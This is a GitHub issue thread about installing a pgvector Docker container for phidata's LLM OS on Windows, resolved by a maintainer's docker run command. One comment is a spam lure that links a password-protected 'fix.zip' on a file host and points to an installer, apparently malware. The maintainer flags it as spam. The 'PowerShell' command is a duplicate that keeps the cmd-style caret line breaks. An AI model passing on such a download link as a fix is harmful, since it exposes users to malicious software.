### ISSUE TITLE
Installation problem with Docker pgVector installation on Windows

### ISSUE THREAD

**Issue by Harvester62** [phidatahq/phidata#1111]
Hello. I was trying to setup the LLM OS following the instructions found here (https://github.com/phidatahq/phidata/tree/main/cookbook/llm_os) but I get stuck with the following error when installing the pgVector docker. I am almost sure that I am missing a step or doing it wrong. Here is a screenshot of the console message:

![immagine](https://github.com/user-attachments/assets/a1b54533-a48f-4f45-8cf5-97dcf95b1fe8)

Docker for Windows was previously installed. The two required API Key were set in Windows. Running the Docker command with the virtual environment activated (is it correct?). I have administrator rights on my laptop.

Any help or suggestions would be greatly appreciated. Thank you.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Harvester62** [comment]
Thank you, but what is that? I usually don't download stuff from the cloud without knowing what I am doing. :-)

**Comment by Harvester62** [comment]
Possibly, the issue is caused by the two paths which don't exist in Windows?

**Comment by ysolanky** [comment]
Hey @Harvester62, sorry about that spam. Thanks for not downloading any unauthorized files.

To run a Docker Pgvector container on Windows. Please run:

```
docker run -d ^ 
  -e POSTGRES_DB=ai ^ 
  -e POSTGRES_USER=ai ^ 
  -e POSTGRES_PASSWORD=ai ^ 
  -e PGDATA=/var/lib/postgresql/data/pgdata ^ 
  -v pgvolume:/var/lib/postgresql/data ^ 
  -p 5532:5432 ^ 
  --name pgvector ^ 
  phidata/pgvector:16
  ```

**Comment by ysolanky** [comment]
If you are using power shell, use:

```
docker run -d ^ 
  -e POSTGRES_DB=ai ^ 
  -e POSTGRES_USER=ai ^ 
  -e POSTGRES_PASSWORD=ai ^ 
  -e PGDATA=/var/lib/postgresql/data/pgdata ^ 
  -v pgvolume:/var/lib/postgresql/data ^ 
  -p 5532:5432 ^ 
  --name pgvector ^ 
  phidata/pgvector:16
  ```

**Comment by Harvester62** [comment]
Thank you @ysolanky for the correct syntax of that command. It worked! 

Now, I can start digging into this interesting concept of LLM OS.

It would be nice to add Windows specific instructions in the documentation in the future.

**Comment by Harvester62** [comment]
I consider this issue as resolved and I close this bug report.

**Comment by Harvester62** [comment]
I consider this issue as resolved and I close this bug report.
